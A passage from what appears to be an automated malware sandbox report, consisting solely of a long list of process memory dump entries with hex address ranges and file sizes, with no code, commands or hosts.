                                                                                                                                  304KB

                                                                                                                                • memory/2788-183-0x0000027922B70000-0x0000027922BE1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  452KB

                                                                                                                                • memory/2796-217-0x00000000025B0000-0x000000000264D000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  628KB

                                                                                                                                • memory/2796-221-0x0000000000400000-0x00000000008FA000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  5.0MB

                                                                                                                                • memory/2796-152-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2836-210-0x0000000000980000-0x0000000000989000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  36KB

                                                                                                                                • memory/2836-155-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/2836-213-0x0000000000400000-0x000000000089E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4.6MB

                                                                                                                                • memory/2996-234-0x0000000000E10000-0x0000000000E25000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  84KB

                                                                                                                                • memory/2996-404-0x0000000000EB0000-0x0000000000EC5000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  84KB

                                                                                                                                • memory/3012-184-0x00007FF635214060-mapping.dmp
                                                                                                                                • memory/3012-194-0x000001F1412D0000-0x000001F141341000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  452KB

                                                                                                                                • memory/3628-159-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3628-172-0x000000001B760000-0x000000001B762000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3628-166-0x0000000000B50000-0x0000000000B51000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/3836-235-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3940-157-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3948-158-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3964-229-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3964-232-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  340KB

                                                                                                                                • memory/3992-170-0x00000000014B0000-0x00000000014C6000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  88KB

                                                                                                                                • memory/3992-160-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/3992-174-0x0000000002D90000-0x0000000002D92000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/3992-168-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4028-171-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4040-407-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4052-186-0x0000028BF05A0000-0x0000028BF060F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  444KB

                                                                                                                                • memory/4052-188-0x0000028BF0A50000-0x0000028BF0B20000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  832KB

                                                                                                                                • memory/4052-153-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4184-244-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4228-420-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4240-412-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4816-413-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4928-272-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4928-402-0x0000000004F04000-0x0000000004F06000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4928-391-0x0000000004F03000-0x0000000004F04000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4928-390-0x0000000004F02000-0x0000000004F03000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4928-388-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4928-385-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.1MB

                                                                                                                                • memory/4928-384-0x0000000002240000-0x00000000022CE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  568KB

                                                                                                                                • memory/4936-265-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4944-383-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  860KB

                                                                                                                                • memory/4944-382-0x0000000000790000-0x0000000000864000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  848KB

                                                                                                                                • memory/4944-266-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4952-257-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4952-294-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4952-299-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4952-305-0x0000000003050000-0x0000000003051000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4960-268-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4960-371-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  36KB

                                                                                                                                • memory/4968-291-0x0000000000950000-0x0000000000951000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4968-273-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4968-297-0x0000000002B70000-0x0000000002B71000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4968-301-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4976-376-0x0000000000400000-0x0000000002B9C000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  39.6MB

                                                                                                                                • memory/4976-270-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4976-377-0x0000000002BE0000-0x0000000002C0F000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  188KB

                                                                                                                                • memory/4984-271-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4992-255-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/4992-397-0x0000000000450000-0x00000000004FE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  696KB

                                                                                                                                • memory/4992-400-0x0000000004B50000-0x0000000004B51000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4992-398-0x0000000000400000-0x0000000000446000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  280KB

                                                                                                                                • memory/5000-312-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5000-364-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5000-262-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5000-319-0x00000000002C0000-0x00000000002C1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5008-379-0x0000000005640000-0x0000000005641000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5008-302-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5008-318-0x0000000000B90000-0x0000000000B91000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5008-275-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5012-336-0x0000000000960000-0x0000000000961000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5012-274-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5012-374-0x0000000005720000-0x0000000005721000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5012-317-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5024-267-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5032-298-0x0000000000710000-0x0000000000711000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5032-256-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5032-290-0x00000000002D0000-0x00000000002D1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5032-322-0x0000000000B30000-0x0000000000B32000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/5040-339-0x0000000005520000-0x0000000005521000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5040-327-0x0000000005B40000-0x0000000005B41000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5040-331-0x0000000005660000-0x0000000005661000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5040-330-0x0000000005530000-0x0000000005531000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5040-300-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5040-264-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5040-346-0x0000000005590000-0x0000000005591000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5040-306-0x0000000000180000-0x0000000000181000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5048-258-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5056-260-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5056-368-0x00000000006A0000-0x00000000006A1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5056-320-0x0000000001330000-0x0000000001331000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5056-307-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5064-386-0x0000000000400000-0x0000000000495000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  596KB

                                                                                                                                • memory/5064-381-0x0000000000760000-0x00000000007EE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  568KB

                                                                                                                                • memory/5064-269-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5072-326-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5072-316-0x0000000001150000-0x0000000001151000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5072-359-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5072-358-0x0000000005600000-0x0000000005601000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5072-263-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5080-328-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5080-259-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5080-309-0x0000000077E20000-0x0000000077FAE000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  1.6MB

                                                                                                                                • memory/5080-380-0x0000000005830000-0x0000000005831000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5088-254-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5096-296-0x0000000000EA0000-0x000000000152E000-memory.dmp
                                                                                                                                  Filesize

                                                                                                                                  6.6MB

                                                                                                                                • memory/5096-261-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5240-429-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5280-430-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5380-431-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5460-432-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5476-433-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5504-434-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5516-435-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5564-436-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5592-437-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5788-446-0x0000000000000000-mapping.dmp
                                                                                                                                • memory/5840-448-0x0000000000000000-mapping.dmp